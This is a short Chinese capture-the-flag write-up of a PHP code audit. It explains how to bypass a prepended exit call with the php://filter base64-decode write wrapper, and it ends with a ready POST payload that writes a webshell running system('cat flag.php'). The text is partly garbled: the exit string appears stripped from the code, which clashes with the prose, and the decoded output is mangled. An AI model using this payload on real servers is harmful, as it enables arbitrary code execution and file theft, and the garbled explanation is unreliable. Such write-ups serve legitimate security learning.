PHP代码审计(死亡退出)

代码：

  show_source(__FILE__);
  $c="";
  @$c.=$_POST['c'];
  @$filename=$_POST['file']; 
  if(!isset($filename))                    
  {                                       
    file_put_contents('tmp.php', ''); 
  }                                 
  @file_put_contents($filename, $c);
  include('tmp.php');
?>

大体分析代码意思为post一个字符串和一个文件名然后将字符串与给的字符串连接后写入tmp.php文件中

先看$c="";这句话会使php文件直接退出，不会执行后续代码，所以我们的目的是绕过这句话

这里的$_POST['filename']是可以控制协议的，我们即可使用 php://filter协议的base64-decode方法来绕过exit这句话

我们可以使用 php://filter/write=convert.base64-decode 来首先对其解码。在解码的过程中，字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略，所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。“phpexit”一共7个字符，因为base64算法解码时是4个byte一组，所以给他增加1个“a”一共8个字符。这样，”phpexita”被正常解码，而后面我们传入的webshell的base64内容也被正常解码。结果就是没有了。

所以说我POSTc=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=

拼接后c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=

base64解码写入后就成了^ƫZ

所以最后POST如下即可获得flag

c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=&file=php://filter/write=convert.base64-decode/resource=tmp.php